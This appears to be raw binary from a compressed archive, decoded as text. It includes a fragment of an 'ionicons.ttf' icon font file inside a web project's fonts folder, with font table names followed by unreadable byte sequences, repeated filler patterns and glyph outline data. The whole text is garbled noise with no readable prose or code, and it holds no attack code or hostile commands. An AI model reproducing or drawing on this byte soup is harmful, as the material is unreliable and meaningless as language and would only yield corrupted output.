����*�fQ���r����X�7ϟ��?�uʊ+���{�6����]E��?�I��{�N�y��3^,�;��&��z��u�?Hd���!�����K�@��)�r1��%���EF�@�d���F6��Om:ʌ��Jz�ow�]to���Z�+ɣ��Ñ,u;s��;�7��&���G����xA�'�}��>��W�)g��x�}�=N�@��� !�#lA
o֖+wIPD����N,%vdo�����	8������ A�v�7�7�.�����t�n��>-7q�L-��u�,��s�,w����i�1�����Ao�8LJ�&n�e�E��r�y�ܡ��1
hD0<c,p�9$GؐF�G�֬W�=R��H���U,�d]���b��pmb�����W�d&�j�W��БѱX�0�6bTD�Z�>5+1�33ɋ��T��2f	դRe��L�L�A)n�XRȳ�6�H���)v|f:Nw��r��;�\x�s�)�џ��g.1p=����ޜ�Ji]�e��`��2�3��'�R��7�p�x�m�c���F��j��J���~׳Uoֶ�)S�HR۶�Զm�ƽ�3�n~���o��>cα�����{�A���?��nnac��6�
�qm<�&�	m"��&�Im2�ܦ�)m*�ڦ�im�Mg��6��d3�,6�
��lv��洹ln���l~[���l�U�X��j5�[Ú��-b��b��-aKZ��ֱ���oK�Ҷ�-k��򶂭h+�ʶ��j��궆�ik�ڶ��k����mh�ƶ�mj��涅mi[��6Զ�mm;�ކ����d;�.��
��lw����lo����l;����`;����p;Ž���ha#m�c��qv��`'�Iv��b��iv��ag�Yv��c��yv�]`�Ev�]b��ev�]aW�Uv�]c��uv��`7�Mv��b��mv��aw�]v��c��^����A{��G�Q{��'�I{ʞ�g�Y{Ξ��E{�^�W�U{�^�7�M{�޶w�]{�޷�C��>�O�S��>�/�K�ʾ�o�[�ξ��G��~�_�W��~�?�O������w��q|����>�O���>�O��>�O�S��>�O�|:��g�}&��g�Y}���>���s�<>������/�C�����U�y���}_���}	_�[��w��}_ʗ�e|Y_Η�|E_�W�U|U_�W�5|M_��u|]_��
|C��7�M|S��7�-|K�ʷ����o���>�w�}'��w�]}�������{�>����~���!~��~��G��?֏��?�O�?�O��?���?������/���/��
�ү��֯����o���o�������}~�?��C��?�c��?�O�S��?��s����/�K����k����o�[�����{����G���g���_�W����w����?�O����o�����_�w���b�'Ƹ1^�Ą1QL�Ĥ1YLSĔ1UL�Ĵ1(���c��1f��c��5�l1{�s�\1w���|1,�B1$*Q"CQ�Zԣ�X8�Ec�X<��%���D7zя�b�X&���b�X!V��b�X%V��b�X#֌�b�X'֍�b�� 6��b��$6��b��"���b��Ķ�]l�b��1v��c��5��n�{�{�^�w���~��Aqp��aqxG�Qqt���1*��c�8>N��89N�S�8=Έ3�8;Ήs�8?.�㢸8.�K㲸<��+㪸:��k㺸>n�㦸9n�[㶸=�;㮸;��qo����`<�#�h<���d<O�3�l<���b�/�+�j����f�5p����ʐ!<+<��)�U�5�u�
�M�-�m��]�=�������������������~�_��~�_��~�_��~�_��	?�'����~�O�	7�&���pGpGpG�W|/�~�~����c~���{�=������V�[ao���V�[ao���V�[ao���V�[ao���V�[ao���V�[ao���V�[ao���V�[ao���V�[ao���V�[ao���V�[ao���V�[ao���V�[ao���V�[ao%᳻��J�O�찰��;,찰��;,�/�첰��.�,�����W�W�W�W�W�W�W�W�W�W�W�W�W�W�W�W�������������������������������������������������������������7yO��4yO��4yO��4yO��4Ǽ����{��-�G����{��-�-�-�-�-�-�-�-�-�-�-�m�m�m�m�m�m�m�m�m�m�m�m8m8888888�������]>���]>��s]~�.���{�=>��s=�^���n}�~�������Їׇ��y���'�O<�x>�z���߉�'�N���;�w���߉�o%�J��x+�V��[��o%�J��x+�V��[��o%�J��x+�V��[��o%�J��x+�V��[��o%�J��x+�V��[��o%�J��x+�V��[��o%�J��x+�V��[��o%�J��x+�V��[Y�_�߀߀߀߀߀߀߀߀߀߀߀߀߀߀߀߀߄߄߄߄߄�o�&�M|��6�m��ķ�o�&�M|��6�m��ķ�o�&�M|��6�m��ķ�o�&�M|��6�m��ķ�o�&�M|��6�m�������É�'N<�x8�pv�����ˉ��������'O<�x<����z���م߅߅����g~>=Hz�=�=�=�=��"{��Fҍ���'ه߇߇Og��$�I:�t&�[��%�[���p�$w��[��"�q���EtKtK�-�nw���虸[��"�&�q���EtOtOtOtOtOtOtOtOtOtOtO�-�nw��[��"�q���E�-�nw��[��"�q���E�-�nw��[��"�q���E�-�nw��[��"�q���E�-��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������x�c```d�3��΃�ˌ'A�)K��PK!j�\�\�,it_sanctum/fonts/ionicons/fonts/ionicons.ttfnu&1i��pFFTMm�	��OS/2A9a�`cmapmnx�cvt ����Tfpgm�
x;�p	�gasp�Lglyf��k�t�headk���x6hhea����$hmtxA
I��~loca����T�maxpWr�� name��n���post�������prep�����V�=��Ц3�Ц3�|�LfGLf��PfEd������.�@ ��2 �7�:�D�K�}��������������������������������9�=�G����������������������������
���?���Q:765/-*(&"!	
��U)@&YMQE+33'3#�wffU��3��
9@6YYMSG3+%#!"'&7625#75#�	�^	�@@@]		��00P������!@YMQE+#53'#3���`� `@  �` o�BK�PX@(jjj^MTH@'jjjjMTHY@"!5	+7'3533#!"/&?332376;'3�P`PQ	��	H*>2�3>*�t``i
CC
7>-->��@?ja+3'3533��p�p���`@ @BOSG4+&5463!2"/

�		�		�		�p)@&BhOSG"+%#"/&4625462762	i	
	j		22	}d		d		0�

�0	��%@"B@?MQE+573#�����p�p �`@BOSG%!+632#"/&4?�		�		�]
��
�		�7`I#@ jkOTH#$+6232+"/&547m		1�

�0		d		@		22		j	
	��%@"B@?MQE+%5#535������p�p �`@BOSG%!+7#"&54632		�		�#

�		�7`I#@ jkOTH#$+"&4?#"&46;'&462�d		d		0�

�1	@i	
	j		22	��@@ja+##5#��p�p����`@ @BOSG4+%#!"&54?62=
��
�		�y		�		�p)@&BhOSG"+7632"/"&="&4	i	
	j		22	d		d		0�

�1	����a�j@g{a
Bhfh		[
[
\

O

S
Gcbrpb�c�^\NL'*"+-"+%#"'&'&'&546767632#"&5##"'&5476767632373327654'&'&'&#"32767'"3276767654'&'&'&�$b82-+$ -+/*N<$
	&)		6#(

 !'/& !�	

		)%$(+/0R0H1&	
+


q)$		

"#* 
�





����
3U@R1(%B
h[	YMQE32-,'&! 

3
+!3546;2'354&+"!#"&5475#"&5475#� �@ @I33I�6&&6\x#�# ��@3II3&66��$

$$

$@�@@@=BYM[SG	+7"=43!232+#'37#


}
%

%
�d=d=@
�

6
l
6
�oQo@�@G@DYY	[MSG
+2+#!"=43!25+=!!=3�

%
��

}
 ��Q 
l
6

�

6`@  �  @�@*@'O[SG+2+#!"=43!2�

%
��

}

l
6

�

6@�@G@DYY	[MSG
+2+#!"=43!25+=#3=3�

%
��

}
 Q 1 
l
6

�

6`@  �  @�@B@?YY[MSG		+7"=43!232+#'#3=;5+5


}
%

%
� �  @
�

6
l
6
�  @ ����/:E&@#;1.+#"
BOSG.*+617=432#"=&'&?65'&'&76?64/&?64/.DuTTzDZY�

0A�
qQQu
�@VU&O
�O
����48Q@Nh[	

Z
M
SG555858761/,+('$"44+"&=462"&=46272#!"54;26=3326=!~�H�P8&���@    .�p�))))��� �` $,O@Lh
[[		[OTH*)&%$#"!	+2#!"&=46;76;21264&"624"2"&4~��E'	T
)�L66L6��:)):)-��(
)�7L77Lo):)): �`!%)-�@�
	B
[Y
Y		YOSG**&&""*-*-,+&)&)('"%"%$#! 	+2#!"&511463"!5&#275!375353353��x�����`�@`�� �tt@ 00����$,?@<?[OS	G*)&%"!	
+7"&=463!2+.#6"264&"264&"264L ,,  ,, OYrr0)�**�)@6
�����%@"?OSG	+7"&=463!2+.#L ,,  ,, O0)�**�)@6
����.?@<"B?O[OSG'$!.-3%#3+7+"5#"&=46;;22+'&+"&=463�Z5&u	s%%K
e%R-0�e"9#�#@<#bF"���� (0T@QB?h	[
[
SG.-*)&%"!+"&462'&#""#6"264&"264&"264�Vzz�z!T%Brru�vvS;1X�����?@<B?hfOSG+"&462'&#""#�Vzz�z!T%u�vvS;1X����7^@[%#!,+&B?hhf[OSG1/*(77!"++7&15&547327#"'#&#"742'&#"#"&547>1fH-F8�HfEHe`9#*@*Ec5?\cE/+JbE9L����$7@4!BhfiOSG%)+2"&4654/&#"&'&#"27������So,N�������*K�@?a+'./&466�
�

D c�
�!��

I"""
k
��@
Bjja$+%+#"/&54?67632632���P�R���N@�=	�a+7176"/&?6��
����������(+7/&4?6V���	����
������
(+71'&?6/&7��	�����
�C�@	�a+7/&?62/��
��������`�>BFJNK�PX@X`[
[YYY
Y
	
Y		O		S	G@Yh[
[YYY
Y
	
Y		O		S	GY@BKKGGCC??KNKNMLGJGJIHCFCFED?B?BA@;852/,)'">>+6?6=4623'"32432+"&546;+"3!254+"&=5353'53'53P&`

���I%	%�pp����� !!`��h

��G

�  �  @  @  ����-/@,$	B[OSG$$)+2"&4'76/&#"'&#"2?32?654������LKLLLLLKL�������KKJJKLLK��%@"
BOSG+%"/"&4?'&462762v
������
�=
��
��
��
���%%@"%	BOSG$+$%+%#"/#"/&4?'&?6327632|&��&��

%��%

�=%��%��

&��&
	�0�PO�BK�PX@j^OTH@jjOTHY�#'4+%2#!"&5467>32>32n"00"��%5"!9"0C�1#"16%/	%E1{{%4@1
	B[OSG$!+'76?#!"&546;#"3!25{

 7
B7�@� 
��


� �

	\
7 

)7�@  �


2

 
��

����5@2[[[OSG+2"&4264&"&2"&4264&"�P99P9O$$1������fHHfH!9P99PT$$򃺃���HfHHf � ,8DI��GBK�.PX@8

`
[	\		[[OSG@9

h
[	\		[[OSGY@FEEIFIDA333333755++"&546;2;2=4+";2=4+"54+";2754+";2'3'
	�		�T�GG{{��� ��/<G�

P
\

�

M

�

NNB �!6@3BY[MSG!55++"&546;2'335#"&=#	�		�S]:��C��

O	\6?��RP0?@<YYMQE
		+5!5!5!��  `  `   @`
0@-[OSG

+%!"54?622#!"=43/���		�����		� ((@�@=3@0:&4-)B[OSG10ID+&'&6;2"'&76+"&=46?27676/>
	��	
����	,ASbbR@,+ZV��	,
]SS]
,@�@'O@LB
Ah[[OTH&$! 	+2#".'>264&"7327"&46;�nr:$;$<<""AeJ55J5Z

,@�0,#A?�6J66JE,
 `
$B@?$!BYYMSG#"
	+2!546372#4>3#!"/&6?!5=��	�����A?	
!
	J��
  ��$;@8$#"B@kOQE! 	+%2#!"&=47&/&7%6'7#'#7�		��	
	r	���3>?32�	�		�
-J.D�:$::$:$����@Fq@n8D@?>5	A.-,+"%Bh		h		fffh[OTHFE$$(%
+.546322#"'&"'&'2327'7654&'&'&"'&'&#"7#73s4?�]#!5?�]#! 1)		6-4$7 2)		7-5$%&U�&Ui>]�	i>]�(-60P 5(6-61Q 4)�q�q��@�@@?ja+537�3��3���� �`!h@	
BK�PX@ ^ZOSG@jZOSGY@!
+2#!"&/&3%!47>;2;2n
��
X��K�
�

�1!3	
0�P&@#B
@?OSG+7">35�Xc%!-U4���&@G7-P����+3B@?+)B%# @
?[OSG10-,"!+$&&"&'6&&'654'6776'67277264&"[%"	L	0&
%%	"	L	"�P::P:�D%%%
&0	&"&
%%
&�:P::P��'/K@H$#"!


B[YOQE+%#'#5&''7&'#5367'7675373264&"�, 6!L!6 ,+6L6+�,  , � 6 .. 6 L6
))
6\ ,  ,	 @`#/;GS_kN@K[	

[

O

S
Gjgda^[XUROLIFC@=:7333333331++"=4;2+"=4;2+"=4;2+"=4;2+"=4;2+"=4;2+"=4;2+"=4;2+"=4;2@22�22�22�22�22�22�22�22�22'22222�22222�22222���N2@/10B[OSGHG;942 %%+%#"&=4632676'.'&/&'&'&#"632#"&'.767676762 "	
!"
	" 4
&X&	4�'c0 #j"!



  #j# 0c'Y8
8��@?a+'&4762762~""��""WV`#e#��#e#   ����7F@C,Bhf[\OTH;'#%+2"&46&#"3267654'&#"34762;25476?6�������

1&1	"	'	�������
�!
1
		���(1mK�
PX@(`f[OSG@)hf[OSGY@*).-)1*1#.<++"567>?67654'&#"#47632.>�'	>
M,.=B(s5	.
	 O��**��
@
@jja+%##5##5#7�0```0���������.�@ BK�PX@/``[[OTHK�PX@0h`[[OTH@1hh[[OTHYY@	.,)($"		+$"&46272#!"&54634#!"76322?632d(($�x!c
��~	6
�((���H�j���;��)ISH@#!'3)
?(	
7*BK�PX@Mjjj
`
`	

	`
f[
[
	
O

R
FK�"PX@Njjj
`h	

	`
f[
[
	
O

R
F@Ojjj
`h	

	h
f[
[
	
O

R
FYY@"KJPNJSKSGEB@<:2-%$#" +'%.?&/&67%6>3'#5&#"7754#/"?63232?632'"&4632�


��

	
	(	
��
���
U
:�
f	+4	��

.�
6
	
	�f�
		?�m1!A����>@;[YY	M	SG$"
+%&'&676&"2645#5#3#��]]��]]��B�]��]]��0��������	.@+[YMQE+;#535#53&"&462` �  `((�0((����15D@A B[[[OSG222525,"#	+"&46326326764'&'#"&547&'&"27&42x(z�zzVE6

?4

$N$#44#$N$��;6EVzz�z(
��4#$N$

4#$N$#4Q�� �aK�PX@%`^[PSG@'hf[PSGY�33#31+43!2#!"56254&#";254+"			��	�	b��w		��		#����#�K�PX@0
^j	Z		[OSG@/
jj	Z		[OSGY@"   # #"!	
+2+"&5463;24+*224"7#�

�

8  `��
��

P
 �� ���+G@D! BY[[OSG	+($#		+62"&42+"&5463264&"75&'#;2bt�6<**<*�
��
�
��H��*<**<�v
r `:@7BYYMSG
2+!43!25!5!"&�@
�
 ��@7d�dV��
���5�(@#@a+%''&'&'&7665./�
*6Y$J
%ge),,
-U9,
35OE
 C�V'!n1
+*%5.0`�  A��AK�
PX@+`^	
[OTH@-hf	
[OTHY@@=8620+(%$
  +?2+"'&=3;26=4&+./#54&+";#"&=46;2�p!//!p30p
0p0!//!p)�0/! !/0   0   /! !/��!@?kOSG+2.54264&"FbG<)`."".!�F23�)(?=P 2l!."".����*A@>)(#"B[OSG'&%$
		+"&=46;54631232#;54'5&#1"	

	V>>V	

	���(( 
	�	
E\\E
	�	
2��N�0'@$+*#" B@?ja+7>54'&'7/7'>767574&'&5�%1
/!=1L,~?1L,;%1
/!�:9'+,85T9C'c6T9C'3::&
,.6����+3@0k[OQE	! +	)+"&4622&=#&'5+&5#&=46;d  %U  r
		
i��

��i
		
r
�~!3HT_emw��@����zy]\ZXSQPL/-WU>vutqplkihgfcb`;:987610*(e'%$TI54#"!

B�x?A~}|{OKJA@,+ @jjjkMSG_^NMHFEDCB32&+#"//'&54?676575&'75''&#75'7>753"+5'627''6767267''5677./77'7'77'�aaaaiab�GgII
iII�G��
�
_�




7	��
BBBB		GBB���2�21�	
m1e
�1mw1pr�1X��.		



�� �'3@@=" Bhh[PSG+546226=462#"&=&/#.57462"&5>V>=/		/=C-@..@-�)>>)1K
::
K1� ,-�,,���� BJn@k0$,+Bh	

h


f[[OSG"!JIFEA?>=<:987542)'!B"BC+2"#+"'&'"4#&'&'&762#"&/4.'54;32332726;754"264*k
			� 

��
_|Q!!���+�K�	PX@7_Y
YY
M
S	G@6kY
YY
M
S	GY@&'&%$#"! 

	+*+2#3#3#3+#5#"&=35#535#535#5463� ;;;;;; V ������ �%+%+%*MM*%+%+%����(@%YMSG+2"&45!������`�������m  ���@OSG
+%2#!"&463a

��

����@MQE+=!��@@��#F@CBY[MSG##

	+2#!"5435!#"74>57;��V����\#	--	���
���
-)
	���!@OSG+6"&462"&462"&462G**q**q**�((((((����'=@:"BjO[SG!
''+2+"&46;5+"&46;>?6j	

%<�
%=��	��'*�&�*
! �`#A@>[[OSG
#"

	+%2#!"&463%2#!"&4632#!"&463a

��

B

��

B

��

���O@/?@<YYMQE
		+=!%5!5!@��@��@�  `  �  �x48@5jj[OTH0/" 44+2#"&=476#"&=46323276=4'&26=4�! 0"."%�'/)�&$���
�	

	�! ��$@!OSG

31+7+"54;272+"543`HH�Hh��h��<>@;+"<6BjkMYQE'&!+%#5#53533#+476767>5454&'.'&65&'&62�*33*33
��M,\,/Mx3*33*�	
	55	
��4dR@PNIG3
BK�PX@^ORF@jORFY@	LK75#"+%#4'.'.'><54&'.'&654&5&62+4767>54&'.'&65&'&62�3b
<
$��A(
%N&
A{ZG

		
$%	
�A

/0	
#��0!@0*BOQE +!+476767>5454&'.'&65&'&62���M,\,/M	
	55	
����,%@"&B)
	
?ja#"+7''74?46'&54&#4?65462/&�3DD4>�	��	�>�J!  !J
1�?299q�1
@�@OSG%%+%#"&546325���		�X����<@9hfYMTH	+2"&45#5##335������`p pp ������m pp pp��0@-O[SG
	+%2+"&=#"&46;5462a

��

���

��

���+@(MYQE+%##5#5353��@��@�@��@������O@Lj
kZ	M	Q
E+7#537#53733733#3##7##37]]e
ck@j?]fck?k?jj`6T6����6T6���
TT����#'+/3�@�

hY

MM

Y	[YYMQE00,,(($$  030321,/,/.-(+(+*)$'$'&% # #"!	+2++5#"&=46;5!5#5#5#535353�!"(�("!(�������@�pp#{@@����P00@�00����@OSG+"&462&�zz�zz�zz���AR@O42.-)
B`h[OTHA@<:9876%#"+%'3.#"32?#"&'4'=41'54&5&=4746=7=65>312;3`hJK25KK5*!+6?CiiCY,A`p0@KjK.)TAATP#*0�P-@*
B@
?OSG+2.#'77+@$B9�����RR+==A%\����9OD:0�P&@#B@?OSG+%.#'72�%cX��4U.0@&\��P+==}�1@.Bk[OSG#$+%#"/#"&462&"264}+T&*A^^�]aP99P8=,V]�]]B*$�9P99P �` E@B B@Y[MSG$4+%57#!"&=4;#7"4>35 &��x
:�=A"A+��F;m���(88,#<``��(7\@Y$*0+B@,?O[	O	SG)))7)6/-#! 	
+"+532>7>;55&'#53255#"'67>73R!-3//$
,2QQ�#'//>3
�QQ@5$*
 +?
%)6QT0%#?0
r/TQ65$' �`%6@3BOSG"
%%+3276327632#"/#"/+"54�
vv
�`qz
?N��N@
zq( �`#6@3 	BOSG
#"+2+"=#"=#"54325432543t�ww�`��qz@NN?zq
`�<DPXdq����@�}�~ytBz@jh"[ #[Y
[!

Y[
[		O	S		G��fe  ������������|{xusrpokjeqfq`_ZYVURQLKFEBA>= < <97430/+(%#!3"$+%#;2=;3;12=;57++"'&=#"&=#"= "2=&2"&=4"2=&2"&=47"3&/&#1'36;273#>7'7"&46322"5432�1

	1���
#	�	#
G�	b
�<Y4444YLLZ3
33

3ZL``
`

`
``
`

`
`)(		
&J
		

	`�(4IS\
@IH?=EA<5B@@K�	PX@?j
^
j_


ZM	[SGK�PX@>j
^
jk


ZM	[SG@=jj
jk


ZM	[SGYY@#UTKJZXT\U\PNJSKSGFDB:90/#3#+753++"'&=#"&=#"562"&=4$2"&=47#67'4?63272254&#"3264&#"@�
	1�����4{
	g		
�LLZ4
44

4�
`

`

`

`
e
'@		H
		

	
@�'FPYx@uMG
.*&B

jh
\[[OS	GQQ)(QYQYVTECB@;87541(F)F	''+"#"'&#";276232767&'&'&767&'2+"&#"+"'.7632326'6767+&76�
0		)
$##" 
0-
,
!
230-

0'@<852p0F

' @�'O@LB	jhO[TH''$"
	
+2+"&#"+"'.76323267+&76�)
$##" 
0-
,
!&'@<852p0Z ��1=Ua�@ /94:3S]X^W	BK�PX@Ch	^

h
][[[	

	O		
S
	
G@Ch		f

hi[[[	

	O		
S
	
GY@a`[ZPO+&4?62"'72?'&""/&47676276767'"/2"/&47676276767'"/2�������
���{y��{

{�
���{y��{{�
	RR	R�KKKK�
QQ

<;dK	;;	K	RR	;:cK	<<	K��'?5@2%=B[[OSG+&4?62"'"/&4767627676"/&4767627676������{y#��{y	RR	R
QQ

<;u	RR	;: �`1;B�@"
	"	)BA
@K�	PX@5	
	`^

	
[YMQE@7		hf

	
[YMQEY@=<42A?<B=B752;4;11'48!+'%#'32654/3'355'5+/+=+'+327654'2+5A�)���?#*%)?$�w%	!)��'(.5g��wɜ-%kbbT�\/S2*
|�9-,Y �`7@4B@[MQE!#!+'3#'32654/3'35+532@f���?#*%(@$�((/5fvʝ-%kccS,Y��,8@k@h
(&=973/"B[	[[
O
SG.-<;-8.8,)+2"&4%6&'"67&327&6767&'"&27&'&'767&p�pp�p:<86� 6-�@A8z(&T	<N�
K ,�B;(	�p�pp�%
5`9!%!F4d=-G#�
*% "@"+I#��%.9Eu@r" 68B>:1-(	Bhff
		f[		[OTH&&A?54&.&.&+2"&4264&"7&'67"'&'63264&'&'6'&=67#"'676p�pp�p~�^^�^�(,!
+]5<�($^@(L:		.#!9�p�pp��^�^^�K
 #X
"
(8o3  	3$*"-
�s!%)@)'%#!(+'7''5'7'75/737'7'77'qOrN4V5�NNrrNNrObbOq4U565U4ONrO4V4UsBG?*5.u?3'ED'4?GB;;B5,7,,8+P?GBB4*8
�s@
	(+'7?7'77'5qOrNNrOOrNqqNrOOP"rr"sBG?}>FBBF>J�?GB�BDD��1Q@N		[[
Y
YMQE10.-+)(&!%$!#+3##5#53546;#"7+=476;5#"+;3=3�@8S--*18"*-	(,3@��@+*+@V %
 #+ ����,@)k[MQE!#+3##5#53546;#"�@8S--*18"@��@+*+@����?FQ�Y@3���{ 
w
�oG%O
i7B	�D	BIAK�PX@M
`		_[[
[

[

[		O	S		GK�PX@L
`	k[[
[

[

[		O	S		G@M

h	k[[
[

[

[		O	S		GYY@'A@�����������vutrnm^]NL@FAF#&*"-%+2#"54654'>54'6'#"&"&+#"'&'"327+.54"'=7&'3276467654'&'&'&"&'&'#5&76;1&547&?2632631263236���VC.9
"6"
8.

DU�!
�(((R(( 
(		
%""\��_Kx+/<$  $</'wL_��		I:9E.&$ !#&.E9
!A& &i
3����?�@ %7BK�(PX@0`hf[OSG@1hhf[OSGY@#&*"-%	+2#"54654'>54'6'#"&"&+#"'&'"327+.54���VC.9
"6"
8.

DU��_Kx+/<$  $</'wL_��'7FR��BK�
PX@=	`
O

	
YY		[OSG@>		h
O

	
YY		[OSGY@&GGGRGRQPONMLKJIHEC><31,*)(''%!/+#"&54767&547"#"&5476;"&#"32654&'654&#"327%##5#5353�$+I>59(E'. ":j!D,2)$'
#
"NPPn&'!	
	&9*&
0'�$#w
 <
;DQQNN��)9IU`@]%$Bh	O
	
	
YY[OSGUTSRQPONMLKJ%!&/&*&+7#"&54767&547#"'&5476;#'327654'&#"4&'"&#"32673##5#5353�JA8<*6*#%9�<

k

	y&,$#�NN"PP"�(;.(!*!
z

��"QQ"N��E@B
BhfYMRF	+!!!3#5'3`��@ ���-@(B/(`��`���_xHHxT��+@(
BYMQE+!!?#'#3����@-&(/B(����xTTxH��"2>l@i!B



[[[	YOSG43$#:73>4=,)#2$1 ""+7#53'1"&54622#54#"#53672#!"&5463254#!"3w77
�#777~

��
=��@�

&%d^%
a��
��

A
��<����0g@d$	Bh		h[	Y
M
TH00.,('&%#!	+2#!"&54635#62654&"54&#"5#3547632a

��
V7#77�
��

A
�����

�d%&�a
%^��8LZu~��@�"?;.-#1
}Q
vo^O���B[[	[


[[[OSG:9����|zusigTREC9L:L420/##"'+%42"'42"%#"&547&54626737632#"&5'632'"32767654&67&#"6=&'&'.'&#"327654&#"#"'732@@�@@BtRSt(
7JVEL5
J��	
Q2	5MN5	25NMs
	u
/0
)(�   E	:PP9

&b&M&
���"1	%%	1"%�	n��+4<FR\e�@$	$#	'd.],
QPJI
BK�PX@P		`^



h

f[O[
[OTH@R		hf



h

f[O[
[OTHY@HGcaYXTSMKGRHRED@?<;%"33"(+%"&547&5463267376;2+"&/63267&#"$264&"2654&"27'#"&/62654&"7654&#"�u�t7JZCL1�a
O	

�a0
( 
e��	9QP9

&g&J#
)
�


�
}P


��#+4��BK�
PX@?`	
	
[[\[MQ
E@@h	
	
[[\[MQ
EY@4321/.+*('%$##+62"&4264&"'2#4&#&'.'&'2#4&#3.'!.!!.!(  i�P`P�D*%(Jb���P���W0ˏ}p!.!!.?  ؗiP`�)$*D/bJpៀ�LW}��0��/@,[[OQE+62"&452#4&#52#4&#!.!!.!i�P`P��P��p!.!!.��iP`�ៀ���$@��@�'"�
<	.
	5B

h	
	f	

	
f[[

[

\O\SG&%����zxnlXVPNFD8642*(%@&@ 
$$+"32?32654/7654'&#"'&'2632#"'#"&547&546#"'&'&547632327654'&'&'&'&'&54767632#"'&'&'&#"3j+
X?	+,+@

Lk>,Lk>�#'



"		


`+=X	+
=,+ iK,=jK,=��
		
	
	

			

��mW@T	B[O[	[		[SGkia_XVCA860."("$
+%#"'#"&547&54632632654&'&'&'&/&'&5463232654'&'&'&#"#"'&'&'.#"3276u>,Lk>,
LkY		
!

	
'#�,=jK,=iK?		
			
			
���#Gk@h9%$B		YY
Y[OSGEC;:3210/.(&##
+727#"'&'&'&=#567676733#5#"'&'&=35#5#33276�!"0>``B`` 

04A	�:+p@e&	
#

	(u p�	
���#C@@BjYOTH##+727#"'&'&'&=#567676733#�!"0>``4A	�:+p@e&	
��*l@6'	6%	H:3.)lk+
QU`	BAK�PX@U		h	fh

f`		[

[[

[OTH@V		h	fh

fh		[

[[

[OTHY@ca[YXWPNEC><;#"%+#"'327.'327.=3&547&5462676>7*#'6?#'&#"'&'&'#"'#332767676='��}PDC52	
!-+
Mz8R 
!!	
#"/=9&%$!
8"==
'-#!**=3.#Ri�,*%5#5_)8#
0!%+
"'!3..��*P@M)'%Bjhf[OTH#"%+#"'327.'327.=3&547&5462676��}PDC52	
!-+
Mz8R 
!Ri�,*%5#5_)8#��=�Y@Vkj6B	[		[[

[[OSG}{qodb*3($*(&*)+#"'&'&'&'&'&#"'767323276767654&'#"676326'&'&#";#"'&'&'.'&'&+>763232767676�
 2#" 

	R (&
"		
"#	


"
		

%!2N.3*-E !'7O	G&a
&+	
6|.)	*+

H%
X-$!E)�4@.?a-,+'&'&'&'&'&'767676767654&'&67>�
 2#" ,

	
R 	 (9"N.3*-E !&'7O	G&i&+	
6����S@P@

?Y	M	QE	
+%#7'5#7'5%37#537#5���� ������� ����� ��$�x������ٶ{�������0@-@?ja
	+%'5#'5%#5#5��������$����ٶ����
IUk@hPJ;: 	B

h

f[
	[OSGIIHGEBA@><9876410/.,+)(+2#"&4'674/3277654'&546;&#"2372##7/"&63372#67654'p�p	\@	Pp6,S�5!>
2B]3.

?&.
5I
'�pP
@\p�P2T� ��`7��: -M�qJ�*S,'!q��b�@�ML<BN	A

h

^		h
		ffffffiPSG[YVTSRPOKJIHFCBA?=30('%+7"#"'"&#7'23"&'.'&54%"?6=.#"'726&##'"33'726&#+67632�5		�]0?n9+'

>-		&?"9]#"2#��I��U5
%,'*
0OAq! :�Jq�	H
.@�#E@B#
B	@?[MSG!
+27&"5'2777#"'/+;=!
�
,
�
,
``
Xo	ZY	o|ի����ȸ�����@�,@)
B	@?ja
+27&"5'277!
�
,
�
,
``
|ի�����4TW?@<WVU*)
B[OSG85H@5T8P"40++"+"1;;1327;276=6514'=4&+&'22#+"'"&5&5474636;5			Ddh><jI_s7++I__I+*SW	1�`3653

3563 /"6656"//"65#H"0���c�@BOSG�U+#"'"&5&5474636;227'�+M�M+*Ia		aI+�ґ�+6j6"//"65#H"//�bc����	@@?a		+%'7'37��7��7��45�h�pp�h����@OSG
+2#!"543u�����j��*.=@:BO[[YSG-.+7&547&547&546762353#5&'.>5#"&54$"25I
7pp(
$g`  �		

 �*B
� �|*.=@:B[[O[QE-.+%'"&##5367654763224"h5I
7pp(
$g��  �		

 �*B
� `�!)-15S@P[	M
		Y
M
SG22..252543.1.10/-,238+3#+"./&/#53546;2#354+"3'#5#37#[	

�

	[e��[
^T
@ 	�
		

� �������>�00@-B[OSG! *' 0!/=1+#!"&?6?67>;22+"&/&63>��5g5!�;	

4
�
�	����'G@DBh[OSG!
	'&	+"&=46;546312#&'5&#1"!2#	

	V>>+
5((		

	 
	�	
E\.42
	�	
0�P8@5
BjjjMTH#'!$+%2+53'3#"&5467>32>32n"00"n0PP0f%5"!9"0C�1"#1PTTP6%/	%E1�p2�@BK�PX@+`[[	O	TH@,h[[	O	THY@ ,+('$#2 /#!#%7
+7'#!"=4;54&+53232264&"#64&";Oqq	��		���&4	mD_B#YX#A		7�	&0& ���
+@(
@?MQE+7'#537'64'7'64'77'64�_hh_8!"++0??:(X�X�&\&.l\9�9B�W�WO�( X
#@ 
@?MQE+7'#537'64'7�_hh_8!(X�X�(X(.l(rX
'@$
@?MQE+7'#537'64'7'64'7�_hh_8!"++0(X�X�(X(.l\9�9B�����3^@[&#321B	hh[YOSG0.%$" 

+?'#57#"/.54632654&'&'&#"#'327'5�//A�5?�]934?�]92!3) 6-IL$ 1)7-�3�3N�i>]�i>]���.51Q J#-60P M��@�$,@)# BjOTH$$'+#"&'&'&=67676?622654'�(5 ^B*G?');
J1�2N^-@Y% 
Tc.�~;)1G

 �`".E@BB,&#?`k[OTH&'+2'&"/7'&"/767312/7632d�Z

 
	E�E	
 

c
!	
(d(
	!
9K	QQ
4#
5`T
	 
	@@	
 	
L

 	##	 

3�
4



4����%--@*k[OQE2+>73&/##&=#&=#7#&76"&4620	.+
*-�+h

`�				�`

�   @`
5@2
	BMQE+?'3'77#7'#5?'53�@2�2@@2�2d@2�2@@2�2�@2�2@@@2�2@@2�2@@@2�2@�@	@@a		+=77'=�k��k^>@�=�p��kb>@�@	@@a		+%7''77 >^k��k�=@>bkˀp�=�@�@	@?a		+7''5�>^k��k�=@>bkˀp�=�@�@	@	?a+3''77 �=�k��k^@�=�p��kb����E@B
B@?jkMQE+%5#3'35#'735#7#35�`mL``Ll``lL``Ll�`Ll``lL``Ll``lL @`@	Bja+3'#5?��2	�2�2�@`�2	�2�2�@ �`/@,B@YOSG#3!+32#!"=4;5#'�������`@�0�@` �`/@,B@YOSG#3!+5#32#!"=4;5�������`@�0�@��
.@+
@
	
?ja+#57'537'3'77#7�R2�2RR2�2��R2�2RR2�2dR2�2R��R2�2RR2�2RdR2�2��
8@5B@?[OSG$#$!+54;55#"5%+'732���������x@``@�@``@����,<^@[	2)B		h		[[[
[

O

S
